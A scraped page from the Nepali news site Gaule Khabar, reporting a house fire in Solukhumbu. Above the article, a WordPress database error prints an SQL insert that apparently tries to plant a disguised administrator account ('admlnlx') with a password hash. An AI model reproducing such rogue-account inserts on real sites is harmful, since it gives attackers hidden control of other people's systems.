WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BL2Hsw9YDjEqFrDBB41ZprZ26.kZg51', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 03:47:09', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुको नेचासल्यन गाउँपालिकामा आगलागी, ८ लाख बराबरको क्षति – Gaule Khabar

सोलुखुम्बुको नेचासल्यन गाउँपालिकामा आगलागी, ८ लाख बराबरको क्षति

सोलुखुम्बुको नेचासल्यन गाउँपालिकामा आगलागी, ८ लाख बराबरको क्षति

सोलुखुम्बु । नेचासल्यान गाउँपालिका वडा न ३ का बलिमान बिकको घरमा आगलागी हुँदा ८ लाख बराबरको क्षति भएको छ । चुलोबाट सल्किएको आगोले शुक्रबार राती १२ बजे घर जलेर नष्ट हुँदा सो बराबरको क्षति भएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।

जिल्ला प्रहरी कार्यालय सोलुखुम्बुका अनुसार बिकको एक तले घर जलेर नष्ट भएको छ । आगलागीमा परि घरमा भएको १ तोला सुन, चार तोला चादी सहित सम्पुर्ण धनमाल जलेर नष्ट भएको छ ।

ईलाका प्रहरी कार्यालय नेचाबाट गएका प्रहरी टोली र स्थानियको सहयोगमा शनिबार विहान करिब ४ बजे मात्रै आगो पुर्ण रुपमा नियन्त्रणमा लिइएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका